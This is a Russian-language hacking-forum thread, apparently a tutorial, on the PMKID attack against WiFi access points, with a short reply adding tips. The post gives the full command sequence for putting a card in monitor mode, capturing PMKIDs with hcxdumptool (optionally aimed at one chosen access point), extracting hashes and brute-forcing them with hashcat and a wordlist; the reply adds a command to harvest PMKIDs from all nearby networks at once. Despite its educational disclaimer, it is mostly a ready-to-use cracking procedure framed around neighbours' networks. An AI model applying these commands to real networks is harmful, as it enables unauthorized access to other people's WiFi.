![]() |
ДИСКЛЕЙМЕР Эта атака была открыта случайно во время поиска новых способов атаковать будущий стандарт безопасности WPA3. Этот WPA3 будет атаковать намного труднее из-за современного протокола установления ключей, называемого "Simultaneous Authentication of Equals" (SAE).Статья и видео к ней созданы в образовательных целях! Все что вы делаете, делаете на свой страх и риск. Автор не несет ответственности за использование этой информации в любых целях Привет дорогие друзья! В этой статье я бы хотел поделиться с вами информацией об атаке PMKID на wifi точки доступа. В чем же плюсы такой атаки ? А в том что больше не нужно ждать "соседей" пока они придут домой и подключаться к своему WIFI, что бы отключить их и поймать Рукопожатие - Handshake. В процессе дампа информации от AP, мы сможем найти хеш даже в WireShark : Ну и от дела давайте к практике. Нам понадобиться : сетевая карта которая может переходить в режим монитора и пару утилит такие как Код:
hcxdumptoolКод:
hcxpcaptoolНачнем сбор информации Код:
airmon-ng start *wlan1*Код:
airmon-ngКод:
hcxdumptoolКод:
hcxdumptool -o all-wifi.pcapng -i wlan1mon --enable_status 15Мы можем направить атаку не на все точки доступа сразу, а точечно, выбрать мак адрес и записывать в файл информацию только о нем, для этого откроем Код:
airodump-ng -i wlan1monКод:
echo "XXXXXXXXXXXX" > filterlist.txtНо самое интересное то что утилита Код:
hxcdumptoolИ теперь если мы хотим атаковать определенную AP пишем Код:
hcxdumptool -o all-wifi.pcapng -i wlan1mon --enable_status 15 --filterlist_ap=filterlist.txt --filtermode=2P.S наберитесь терпения, за частую такая атака занимает большое кол-во времени. На сбор 1 PMKID в среднем требуется от 10 до 30 минут. Но бывает и дольше, Но и меньше Как повезет После успешного сбора После того как мы в логах увидели уведомление напротив пакета Код:
PMK FOUNDТеперь нам понадобиться утилита Код:
hcxpcaptoolКод:
hcxpcaptool -z all-wifi.16800 all-wifi.pcapngХочу отметить что тут нужно сначала указывать имя выходного файла "all-wifi.16800", где 16800 напоминалка о режиме hashcat, но об этом не много позже, а all-wifi.pcapng это наш сборник информации из которого мы извлекаем PMKID для брут форса. Должно получиться примерно такое : https://forum.antichat.xyz/attachmen...57d787215b.png Теперь за дело берется наш кот, кормим его не вискасом,а нашим хешем =)HASHCAT https://forum.antichat.xyz/attachmen...f5ce6476a5.png Код:
hashcat -m 16800 -a 0 -w 3 *хеш из файла либо путь к нему* /home/user/all-wifi.16800 *путь к словарю* /home/user/rockyou.txtТут уже будет зависеть от ваших словарей, либо фантазии по маске в hashcat. А на этом я буду заканчивать, а вдруг вам было лень прочитать и вы просто пролистали в низ, так же имеется Видео-версия данной статьи Всем спасибо и приятного просмотра! |
Цитата:
Цитата:
Код:
eapol && wlan.rsn.ie.pmkidЧто касается времени сбора PMKID, собрать их можно мгновенно со всех точек в эфире сделав "вспышку" аутентификацией. К примеру командой Код:
wifi.assoc allИзвиняюсь, не мог пройти мимо как большой любитель WiFi. |
Цитата:
|
| Время: 06:19 |